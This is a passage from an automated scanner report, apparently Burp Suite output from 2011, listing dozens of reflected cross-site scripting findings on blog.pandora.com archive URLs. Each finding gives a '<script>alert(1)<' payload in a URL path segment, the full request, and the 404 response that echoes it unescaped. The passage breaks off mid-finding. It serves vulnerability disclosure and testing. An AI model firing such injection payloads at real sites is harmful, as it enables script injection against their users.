The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora37767<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora37767<script>alert(1)< ...[SNIP]... |
3.46. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/02 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bb5d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5bb5d<script>alert(1)< ...[SNIP]... |
3.47. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/02 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006654b6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006654b6<script>alert(1)< ...[SNIP]... |
3.48. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/02 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/025aa91<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)< ...[SNIP]... |
3.49. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/03 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad88f4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad88f4<script>alert(1)< ...[SNIP]... |
3.50. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/03 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives970b7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives970b7<script>alert(1)< ...[SNIP]... |
3.51. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/03 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200635243<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200635243<script>alert(1)< ...[SNIP]... |
3.52. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/03 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/035e7ab<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)< ...[SNIP]... |
3.53. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/04 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad20c0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad20c0<script>alert(1)< ...[SNIP]... |
3.54. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/04 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesae903<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesae903<script>alert(1)< ...[SNIP]... |
3.55. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/04 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20067efd0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20067efd0<script>alert(1)< ...[SNIP]... |
3.56. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/04 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/048bc6a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)< ...[SNIP]... |
3.57. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/05 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracd43a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracd43a<script>alert(1)< ...[SNIP]... |
3.58. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/05 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives47765<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives47765<script>alert(1)< ...[SNIP]... |
3.59. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/05 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20068006b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20068006b<script>alert(1)< ...[SNIP]... |
3.60. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/05 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/05aa7d3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)< ...[SNIP]... |
3.61. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/06 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora33c8f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora33c8f<script>alert(1)< ...[SNIP]... |
3.62. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/06 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4f087<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4f087<script>alert(1)< ...[SNIP]... |
3.63. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/06 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20063dbfc<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20063dbfc<script>alert(1)< ...[SNIP]... |
3.64. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/06 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/06c455f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)< ...[SNIP]... |
3.65. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/07 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafd617<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafd617<script>alert(1)< ...[SNIP]... |
3.66. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/07 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec7f7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesec7f7<script>alert(1)< ...[SNIP]... |
3.67. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/07 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200623e21<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200623e21<script>alert(1)< ...[SNIP]... |
3.68. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/07 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/071665f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/071665f<script>alert(1)< ...[SNIP]... |
3.69. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/08 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1e163<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora1e163<script>alert(1)< ...[SNIP]... |
3.70. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/08 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc27be<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc27be<script>alert(1)< ...[SNIP]... |
3.71. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/08 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b3449<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b3449<script>alert(1)< ...[SNIP]... |
3.72. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/08 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0841581<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/0841581<script>alert(1)< ...[SNIP]... |
3.73. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/09 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafc284<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafc284<script>alert(1)< ...[SNIP]... |
3.74. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/09 |
Issue detail
